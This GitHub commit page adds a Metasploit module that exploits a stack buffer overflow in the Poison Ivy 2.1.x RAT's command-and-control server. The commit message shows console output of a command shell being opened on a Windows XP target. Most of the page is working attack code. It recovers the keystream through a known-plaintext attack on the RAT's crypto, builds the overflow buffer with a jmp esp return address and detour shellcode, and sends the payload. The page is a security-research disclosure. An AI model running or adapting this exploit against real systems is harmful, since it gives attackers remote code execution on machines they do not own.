Skip to content

Commit 290e1eb

Browse files
samvartakasamvartaka
committed
This module exploits a previously unknown stack buffer overflow vulnerability
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't require knowledge of the secret key as it abuses a flaw in the cryptographic protocol. Note that this is a different vulnerability from the one affecting versions 2.2.0 and up (https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof). See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details. ## Console output Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is set to 'pivypass' and unknown to attacker). ### Version 2.1.4 ``` msf > use windows/misc/poisonivy_21x_bof msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104 RHOST => 192.168.0.104 msf exploit(poisonivy_21x_bof) > check [*] 192.168.0.104:3460 The target appears to be vulnerable. msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp PAYLOAD => windows/shell_bind_tcp msf exploit(poisonivy_21x_bof) > exploit [*] 192.168.0.104:3460 - Performing handshake... [*] Started bind handler [*] 192.168.0.104:3460 - Sending exploit... [*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4> ```
1 parent 0a0e7ab commit 290e1eb

File tree

1 file changed

+187
-0
lines changed

1 file changed

+187
-0
lines changed

modules/exploits/windows/misc/poisonivy_21x_bof.rb

Lines changed: 187 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,187 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Exploit::Remote
9+
Rank = NormalRanking
10+
11+
include Msf::Exploit::Remote::Tcp
12+
13+
def initialize(info = {})
14+
super(update_info(info,
15+
'Name' => 'Poison Ivy 2.1.x C2 Buffer Overflow',
16+
'Description' => %q{
17+
This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.
18+
The exploit does not need to know the password chosen for the bot/server communication.
19+
},
20+
'License' => MSF_LICENSE,
21+
'Author' =>
22+
[
23+
'Jos Wetzels' # Vulnerability Discovery, exploit & Metasploit module
24+
],
25+
'References' =>
26+
[
27+
[ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ],
28+
],
29+
'DisclosureDate' => 'Jun 03 2016',
30+
'DefaultOptions' =>
31+
{
32+
'EXITFUNC' => 'thread',
33+
},
34+
'Payload' =>
35+
{
36+
'Space' => 0x847 # limited by amount of known plaintext (hard upper limit is 0xFFD)
37+
},
38+
'Platform' => 'win',
39+
'Targets' =>
40+
[
41+
[
42+
'Poison Ivy 2.1.4 on Windows XP SP3',
43+
{
44+
'Ret' => 0x00469159, # jmp esp from "Poison Ivy 2.1.4.exe"
45+
'StoreAddress' => 0x00520000, # .tls section address from "Poison Ivy 2.1.4.exe"
46+
'InfoSizeOffset' => 0x1111, # offset of InfoSize variable
47+
'DecompressSizeOffset' => 0x1109, # offset of DecompressSize variable
48+
'Packet2Offset' => 0xB9E # offset of second packet within server's response
49+
}
50+
]
51+
],
52+
'DefaultTarget' => 0
53+
))
54+
55+
register_options(
56+
[
57+
Opt::RPORT(3460)
58+
], self.class)
59+
60+
end
61+
62+
# XOR two strings
63+
def xor_strings(s1, s2)
64+
s1.unpack('C*').zip(s2.unpack('C*')).map{ |a,b| a ^ b }.pack('C*')
65+
end
66+
67+
# Obtain keystream using known plaintext
68+
def get_keystream(ciphertext, knownPlaintext)
69+
if(ciphertext.length < knownPlaintext.length)
70+
return xor_strings(ciphertext, knownPlaintext[0, ciphertext.length])
71+
else
72+
return xor_strings(ciphertext, knownPlaintext)
73+
end
74+
end
75+
76+
# Apply keystream to plaintext
77+
def use_keystream(plaintext, keyStream)
78+
if(keyStream.length > plaintext.length)
79+
return xor_strings(plaintext, keyStream[0, plaintext.length])
80+
else
81+
return xor_strings(plaintext, keyStream)
82+
end
83+
end
84+
85+
def check
86+
connect
87+
# Poke
88+
sock.put("\x01")
89+
# Fetch response
90+
response = sock.get_once(6)
91+
92+
if (response == "\x89\xFF\x90\x0B\x00\x00")
93+
vprint_status("Poison Ivy C&C version 2.1.4 detected.")
94+
return Exploit::CheckCode::Appears
95+
elsif (response == "\x89\xFF\x38\xE0\x00\x00")
96+
vprint_status("Poison Ivy C&C version 2.0.0 detected.")
97+
return Exploit::CheckCode::Safe
98+
end
99+
100+
return Exploit::CheckCode::Safe
101+
end
102+
103+
def exploit
104+
# Known plaintext from C2 packet
105+
knownPlaintext1 = "\x89\x00\x69\x0c\x00\x00"
106+
knownPlaintext2 = "\x69\x0c\x00\x00\x44\xb8\x00\x04\x07\x00\x6d\x70\x72\x2e\x64\x00\x6c\x6c\x05\x0c\x00\x61\x76\x69\x20\x63\x61\x70\x33\x32\x01\x70\x06\x0b\x00\x00\x70\x73\x74\x6f\x72\x65\x63\x01\x01\x34\x08\x0b\x00\x73\x68\x65\x6c\x02\x6c\x03\x6c\x0a\x09\x00\x67\x64\x69\x01\x03\x2c\x0b\x0c\x00\x69\x70\x68\x6c\x10\x70\x61\x70\x69\x01\x50\x0c\x0b\x01\x20\x63\x72\x79\x70\x74\x03\x38\x02\x00\x00\x1d\x03\x00\x00\x00\x55\x8b\xec\x00\x81\xc4\x04\xf0\xff\xff\x50\x81\x00\xc4\x64\xfa\xff\xff\x53\x56\x57\x00\x8b\xf1\x89\x55\xdc\x89\x45\xe0\x00\x8b\x5d\xe0\x8b\x83\x17\x07\x00\x80\x00\x89\x45\xb8\x8b\x83\xc4\x00\x2c\x10\x89\x45\xe8\x8b\x00\x0b\x40\x08\x05\x02\x12\x00\x3b\x89\x45\xe4\x64\xff\x35\x01\x00\x16\x00\x8f\x45\xec\xff\x75\xe8\x00\x8f\x45\xf0\xff\x75\xe4\x8f\x45\x80\xf4\x8d\x45\xec\x64\x89\x05\x01\x18\x00\x89\x65\xf8\x89\x6d\xfc\x8b\x45\x40\xdc\x33\xd2\x89\x50\x02\x00\x07\xc6\x00\x00\x89\xc6\x45\xbf\x00\x83\xbb\x02\xd8\x01\x1e\x0f\x84\x93\x02\x00\x00\x29\x00\x52\x05\xf8\x00\x07\x50\x00\x08\xff\x90\x22\xe0\x00\x09\x8d\x83\xe0\x00\x1e\x50\x8d\x08\x85\x65\xea\x00\x4c\xff\x53\x04\x85\x00\xf6\x74\x14\x83\x7e\x04\x00\x7e\x22\x0e\x80\x21\x8b\x56\x04\x00\x26\x33\xc0\x40\x89\x46\x08\xc7\x45\xc0\x00\x17\x00\x09\x80\x05\x45\xc8\x01\x02\xc4\x8d\x45\xc4\x50\x50\x8d\x45\xc8\x00\x25\xc0\x03\x27\x6c\x41\x80\x0f\x6a\x04\x68\x00\x10\x81\x33\xc8\x00\x50\x6a\x00\xff\x53\x2c\x89\x45\x02\xd4\x06\x40\xdb\x01\x00\x00\x68\x51\x80\x14\x00\x00\x8d\x85\x67\xeb\x01\x36\x0c\x93\x90\x00\x3d\x81\x25\xd8\x33\xff\x80\x80\x7d\xbf\x00\x75\x34\xbf\x06\x80\x08\xee\x57\x00\x3c\x00\x48\x84\x11\x8c\x81\x08\x84\x18\x06\x03\x55\x04\x56\x08\x00\x70\x01\x00\x58\x1f\x02\x58\x19\x00\x8b\x46\x04\x2b\x46\x08\x3d\xfc\x00\x0f\x00\x00\x7d\x05\x89\x45\xd8\x20\xeb\x07\xc7\x45\xd8\x81\x06\x01\x7d\x00\xd8\x83\x7d\xd8\x00\x0f\x86\x58\x01\x00\x41\x29\x7d\xd8\x8b\x45\xd8\x89\x14\x45\xcc\x03\x09\x0f\x00\x09\x69\x45\xc8\x81\x81\x09\x89\x45\xd0\x8b\x45\xd4\x00\x35\x04\xcc\x50\x44\x31\xd0\x50\x8d\x47\x08\x18\x8d\x84\x05\xc2\x22\x40\x0d\x50\x8b\x06\x00\x33\xd2\x52\x50\x8b\x46\x08\x99\x00\x03\x04\x24\x13\x54\x24\x04\x83\x14\xc4\x08\x47\x40\x70\x40\x40\x85\xc0\x74\x62\x30\xc3\x17\x8b\x45\xcc\xd3\x0b\xc8\x14\xff\x86\x93\xc1\x37\x40\x0a\x3b\x45\xd8\x72\xee\x0d\xa0\x6a\x04\x8d\x45\xd8\x80\x28\x04\x85\x28\x21\x83\x13\x83\x45\xcc\x04\x01\x1f\x8d\x47\x17\x06\x06\x89\x02\x85\x7a\x08\x81\x0f\xcc\x50\x8d\x0c\x84\x3d\x88\x5a\xc1\x0e\x03\x7d\xcc\x57\x59\x84\x5a\x8b\x83\x41\x8f\x40\x38\xe0\xc0\x00\xb8\x08\xff\x90\xa4\x40\x38\x84\xc0\x74\x13\x00\x85\xf6\x0f\x84\x23\xfe\xff\xff\x41\x40\x3a\x01\x46\x08\xe9\x18\x80\x02\x68\x0e\x02\x40\x52\xc5\x91\x82\x76\x68\x00\x80\x00\x84\x00\x6a\x00\x9d\xd4\x50\xff\x53\x00\x37\x2a\xb8\xc8\x9e\xe4\x00\x12\x90\x01\x00\x5f\x5e\x00\x5b\x8b\xe5\x5d\xc3\x76\x00\x19\x23\x80\x0f\xc1\xc8\x83\xc4\xe4\x41\xc6\x5d\x10\x20\x8b\x45\x08\x8b\xb0\x01\xc5\x8b\x80\xc9\x45\xc4\x86\xd8\x00\x09\x05\xdd\x80\x84\x68\xc4\x00\x0c\x83\x3b\x00\x7e\x17\x8b\x13\x00\x3b\x50\x04\x74\x10\x8b\x13\x81\x00\xc2\xff\x1f\x00\x00\x81\xe2\x00\x00\xe0\xff\xff\x89\x13\x8b\x38\x8b\x00\xd7\x8b\x0b\x3b\x48\x0c\x74\x60\x81\xc0\x04\x75\x1b\x57\xff\x96\xdc\x60\x0c\xb4\x8b\xf8\x00\x01\xe0\x00\x01\xc0\x00\xe4\xc0\x00\x00\x33\xd2\xeb\x40\x83\x78\x0c\x00\x00\x75\x18\x8b\x03\x50\x6a\x02\xff\x2c\x96\xe8\x80\x02\x82\x04\xec\x01\x01\xd0\xeb\x26\x22\x00\x05\x0a\x07\x6a\x02\x20\x05\x57\xff\x9c\x56\x60\x00\x03\x63\x04\xc2\x1d\x8b\xc2\x03\x1e\x08\xc2\x0c\x00\xa0\x1c\x55\x51\x89\x0c\x00\x24\x8b\xfa\x8b\xf0\x8b\xc6\x8b\x02\xa8\x42\x1d\xdf\x54\x57\x56\xff\x95\x01\xc1\x1c\x89\x03\x8b\x04\x24\x89\x43\x08\x0c\x5a\x5d\x20\x06\xc3\x71\x00\x21\x43\xa0\x1e\x60\x06\x8b\xc8\x8b\xb1\x22\x05\xda\x60\x33\xc9\xff\x96\xd4\xa0\x0f\x20\x68\x43\x02\x04\x81\x00\x08\x5e\x5b\xc3\x72\x00\x82\x2a\xec\x04\xca\x33\xdb\x89\x19\x60\x00\xd4\x59\x04\x81\x00\x08\x81\x00\x0c\x45\x07\x00\x06\x58\x73\x00\xa6\x01\x06\x80\x93\x51\xc1\x2e\x55\x22\x0c\xc1\x2e\xf0\x8b\xbe\x63\x0c\x83\x7b\x00\x08\x00\x7c\x53\x83\x7d\x14\x00\x00\x7c\x4d\x8b\x4b\x08\x03\x4d\x14\x00\x89\x4d\xfc\x83\x7d\xfc\x00\x7e\x80\x3e\x8b\x4d\xfc\x3b\x4b\x04\x00\x2b\x91\xe1\x00\x0c\x7e\x09\xe0\x01\xff\x97\xe1\x11\xa0\x8b\x45\xfc\x89\x43\x00\x50\x14\x40\x46\x00\x10\x50\x8b\x03\x03\x43\x08\x50\x0c\xff\x96\xe3\x5c\x20\x03\x08\x8b\x45\x14\x10\xeb\x02\x33\xc0\xa0\x1a\x59\x5d\xc2\xc0\x10\x00\x8b\xc0\x53\x56\x86\x1a\x9c\x15\x18\x74\x00\x3e\x00\x1e\xa8\x44\x7d\x14\x8b\x50\x55\x08\x8b\x82\x82\x15\x8a\xa2\x44\x4d\x90\xe8\x8b\x80\xd0\x80\x04\x05\x85\xc0\x1a\x05\xbf\x44\x00\xe4\xa6\x5d\x0c\x8b\x43\x08\x00\x85\xc0\x7c\x28\x85\xff\x7c\x24\x00\x8b\x73\x04\x2b\xf0\x85\xf6\x7e\x00\x1b\x3b\xfe\x7d\x02\x8b\xf7\x56\x00\x8b\x0b\x03\xc8\x51\x8b\x45\x10\x08\x50\xff\x92\xc1\x18\x01\x73\x08\xeb\xc2\x07\xa2\x39\x33\xf6\x8b\xc6\xe0\x18\x00\x58\x77\x02\x19\x9f\x28\x9f\x28\xfc\x9f\x28\x9f\x28\x3a\x3e\x75\x1c\x00\x2d\x21\x3e\xdf\x4f\xc8\x4f\x77\x01\x67\x00\x85\xfd\x47\x00\x78\x01\x6e\x74\x00\xbc\x88\x00\x79\x01\x6a\x6b\xdf\x00\x5c\x00\x7a\x01\xc3\x53\xa3\x83\x00\x00\x7b\x01\xb5\xad\x12\x2e\x00\x00\x18\x01\x93\xae\x6a\x9d\x00\x1c\x00\x01\x8c\xad\x5d\xdb\x00\x1f\x03\x00\x4d\x26\xab\x1c\x00\x20\x01\xc4\x00\x09\x78\x78\x00\x22\x03\x23\xd5\x00\x1f\xda\x00\x23\x01\x60\x3b\x66\x00\x86\x00\x24\x07\x69\x5b\x5d\xbb\x00\x00\x25\x01\x75\xc0\xd4\x44\x00\x00\x45\x01\x75\xd7\xd0\xa7\x00\x46\x00\x01\x09\xb4\x58\x3b\x00\x47\x01\x00\xc7\x69\x89\xc3\x00\x48\x01\x17\x00\x3f\x53\x1e\x00\x49\x01\x69\x1f\x00\x19\xf0\x00\x4b\x03\x0b\xb5\xf9\x00\x49\x00\x7c\x05\x2c\x88\x92\x65\x90\x00\x03\x00\xb6\xc6\xe9\xf0\xf7\xe3\xe8\x00\xf0\x89\x75\xb0\x8b\x45\xb0\x8b\x0e\x98\x22\x41\x00\x01\x46\x86\x43\x0c\x05\xab\x07\x3f\xe8\x01\x11\x93\x20\x8d\x55\x9c\x8b\xc6\x98\xff\x93\xc8\x20\x24\x01\x05\x80\xdc\xa0\x01\x00\x56\x8b\xf0\x8d\xbd\x6c\xff\xff\x84\xff\xa5\x00\x00\x5e\xc7\x45\xc8\x20\x6e\x32\x00\xb1\x6f\x8d\x85\x51\x01\x70\x2e\xb0\x8b\x02\x80\x82\x52\xff\x53\x7c\x8d\x85\x7c\x11\x90\x02\x50\xff\x93\xc0\x4f\x00\xff\xb5\x62\x70\xc0\x00\xff\x93\x88\x50\x04\x61\x02\xff\xa0\x50\x24\x89\x45\xc8\x81\x57\xc8\x70\x66\xc0\x9c\x50\x56\xff\x93\xcc\x90\x06\x20\x05\x4e\xff\x10\x02\xda\x73\xd0\x07\xff\x50\x00\x74\xcc\x9d\x43\x76\xcc\x10\x05\xc1\x27\xf1\x09\x4d\xcc\x20\x0a\x0c\x53\x6c\xf6\x55\x70\x66\x45\xb0\xff\x50\xf2\x30\x40\x40\x45\xc8\xe1\x02\xb0\x77\x12\x58\x0f\x05\x3f\x0b\x05\x01\x78\x0f\x05\xb1\x63\xd2\x07\x30\x5b\xb0\x8d\x0c\x88\xeb\x90\x09\x41\x02\xc6\xff\x53\x6c\xe8\xc7\x85\xd0\xa0\x5e\x9c\x11\x01\x92\x00\x40\x09\xca\x94\xc0\x00\x68\x18\x01\x8d\x45\x66\x0d\x71\x0e\x0a\x84\x79\x0e\x6a\x60\x41\xb0\x05\x57\x04\x94\x00\x00\x5a\x01\x01\xd0\x06\x05\x5b\x5c\x01\x39\x30\x01\x8b\x80\x71\x13\x90\x7c\xb0\x00\xff\x90\x16\xa4\x80\x06\xf0\x06\x14\x91\x19\xf8\xff\x93\x16\x24\x70\x00\xe0\x00\x18\x60\x00\x89\x45\xc4\x2c\x68\x00\x70\x00\x69\x02\x1c\xf0\x00\x6a\x0f\x35\x66\x02\x20\xe1\x00\x0a\x02\x02\x31\x05\x0f\x31\x13\x50\x97\xb0\x97\x68\xf4\x70\x01\xff\x55\xd8\xc0\x0f\x31\x2b\x45\xe0\x1b\xb2\x98\x50\x01\xee\x8b\xa0\x8d\x9a\x03\x20\x89\xb0\x06\x08\x92\x05\x90\x77\x06\xe0\x39\x0c\xa1\x17\xb8\x6a\x00\x6a\x01\x03\x70\x5f\xb1\x18\x0c\x89\x45\xc0\x83\x7d\xb0\xc0\xff\x74\x41\x40\x01\xb0\x22\xbc\x20\x85\x61\x00\x0e\x8d\x85\x94\xf8\xa0\x8f\x31\x01\x68\x80\x7f\x74\x04\x40\x8b\x45\xc0\x30\x0c\x02\x2c\x40\x08\x33\xd2\x83\xfa\xff\x75\x20\x03\x83\xf8\xff\x74\x90\x97\xbc\xb9\x62\x4c\xd0\x0e\x99\xf7\xf9\x00\xa1\x51\x14\xb8\x03\xb9\x06\xc0\x9b\x48\x85\xc0\x72\x20\x40\x20\x89\x45\xac\x8d\xbd\x01\x05\x6a\x4c\x02\x57\x68\x17\x83\xc7\x4c\xff\x4d\xac\x4c\x75\xea\xc1\x05\x11\x0f\x50\x14\xd1\x09\xb4\xda\x6a\x40\x95\x43\xd2\x07\x80\x00\xf2\x80\x33\x00\x29\x0a\xb4\xd0\x07\xf0\xd0\x07\x85\xc0\x74\x1c\xcc\x8d\x8d\x41\x01\x95\x1e\x8d\x8d\xb1\x02\xd5\x00\x00\xff\x45\xb4\x83\x7d\xb4\x0a\x75\x98\xbb\x68\x7d\xc0\x34\x40\x05\x8b\x80\x91\x36\x01\x59\x09\xc6\x45\xd3\x01\x8d\x4d\x9c\x28\x8d\x55\xd2\xc1\x29\x08\x93\x03\x93\xc4\x07\xc0\x05\xa2\x52\x63\x52\xc3\x9b\x09\xf6\x4c\x00\x1f\x0b\x00\x9c\x09\x80\xa3\x44\x00\xba\x00\x9d\x09\x4d\x4b\x58\x5a\x00\x00\x6b\x01\x3f\x05\x3b\x6a\x00\x00\xb8\x09\x9c\xb5\x85\x98\x00\xb9\x00\x09\xf0\x76\xf1\xce\x00\xa9\x00\x0e\x82\x20\x10\xb1\x5e\x82\x69\x5d\x14\x8b\x7d\x01\xf0\x9e\xff\x00\x33\xf6\x6a\x00\x53\x09\xc0\x58\x03\xc6\xf0\x0b\x0c\x50\xff\x57\x0a\x18\x31\x13\x10\x10\x0c\x0c\x03\xf0\x2b\x00\xd8\x85\xdb\x75\xdf\xc6\x45\xff\xb0\x01\x8a\x45\xff\x20\x07\x12\x66\x90\xa2\x4e\x0c\x8b\xe9\x84\x76\x32\x42\x55\xff\x53\x70\x00\x88\x04\x24\x6a\x01\x8d\x44\x24\x0c\x04\x50\x30\x77\x72\x38\x33\xc0\x8a\x04\x18\x24\x50\x55\xe5\x00\xa3\x77\x1b\x00\x3e\x7b\x81\x08\x4f\x04\x00\x4f\x04\xc1\x3c\x4f\x04\x60\x76\xbd\x00\x02\xf7\x6c\x55\xd8\x00"
107+
108+
# detour shellcode (mov eax, StoreAddress; jmp eax)
109+
detourShellcode = "\xB8" + [target['StoreAddress']].pack("V") # mov eax, StoreAddress
110+
detourShellcode << "\xFF\xE0" # jmp eax
111+
112+
# Padding where necessary
113+
compressedBuffer = payload.encoded + "\x90" * (0xFFD - payload.encoded.length)
114+
115+
# Construct exploit buffer
116+
exploitBuffer = "A" * 4 # infoLen (placeholder)
117+
exploitBuffer << compressedBuffer # compressedBuffer
118+
exploitBuffer << "\xFF" * 0x104 # readfds
119+
exploitBuffer << "C" * 4 # compressionType
120+
exploitBuffer << "D" * 4 # decompressSize (placeholder)
121+
exploitBuffer << "E" * 4 # pDestinationSize
122+
exploitBuffer << "F" * 4 # infoSize (placeholder)
123+
exploitBuffer << "G" * 4 # headerAllocSize
124+
exploitBuffer << [target['StoreAddress']].pack("V") # decompressBuffer
125+
exploitBuffer << "H" * 2 # decompressBuffer+4
126+
exploitBuffer << "I" * 6 # lParam
127+
exploitBuffer << "J" * 8 # timeout
128+
exploitBuffer << "K" * 4 # hWnd
129+
exploitBuffer << "L" * 4 # s
130+
exploitBuffer << "M" * 4 # old EBP
131+
exploitBuffer << [target['Ret']].pack("V") # EIP
132+
exploitBuffer << [target['StoreAddress']].pack("V") # arg_0
133+
exploitBuffer << detourShellcode # detour to storage area
134+
135+
# Calculate values
136+
allocSize = exploitBuffer.length + 1024
137+
infoLen = payload.encoded.length
138+
infoSize = (infoLen + 4)
139+
140+
# Handshake
141+
connect
142+
print_status("Performing handshake...")
143+
144+
# Poke
145+
sock.put("\x01")
146+
147+
# Fetch response
148+
response = sock.get(target['Packet2Offset'] + knownPlaintext1.length + infoSize)
149+
150+
eHeader = response[target['Packet2Offset'], 6]
151+
eInfo = response[target['Packet2Offset'] + 10..-1]
152+
153+
if ((eHeader.length >= knownPlaintext1.length) and (knownPlaintext1.length >= 6) and (eInfo.length >= knownPlaintext2.length) and (knownPlaintext2.length >= infoSize))
154+
# Keystream derivation using Known Plaintext Attack
155+
keyStream1 = get_keystream(eHeader, knownPlaintext1)
156+
keyStream2 = get_keystream(eInfo, knownPlaintext2)
157+
158+
# Set correct infoLen
159+
exploitBuffer = [infoLen].pack("V") + exploitBuffer[4..-1]
160+
161+
# Set correct decompressSize
162+
exploitBuffer = exploitBuffer[0, target['DecompressSizeOffset']] + [infoSize].pack("V") + exploitBuffer[(target['DecompressSizeOffset'] + 4)..-1]
163+
164+
# Build packet
165+
malHeader = use_keystream("\x89\x01" + [allocSize].pack("V"), keyStream1)
166+
167+
# Encrypt infoSize bytes
168+
encryptedExploitBuffer = use_keystream(exploitBuffer[0, infoSize], keyStream2) + exploitBuffer[infoSize..-1]
169+
170+
# Make sure infoSize gets overwritten properly since it is processed before decryption
171+
encryptedExploitBuffer = encryptedExploitBuffer[0, target['InfoSizeOffset']] + [infoSize].pack("V") + encryptedExploitBuffer[target['InfoSizeOffset']+4..-1]
172+
173+
# Finalize packet
174+
exploitPacket = malHeader + [encryptedExploitBuffer.length].pack("V") + encryptedExploitBuffer
175+
176+
print_status("Sending exploit...")
177+
# Send exploit
178+
sock.put(exploitPacket)
179+
else
180+
print_status("Not enough keystream available...")
181+
end
182+
183+
select(nil,nil,nil,5)
184+
disconnect
185+
end
186+
187+
end

0 commit comments

Comments
 (0)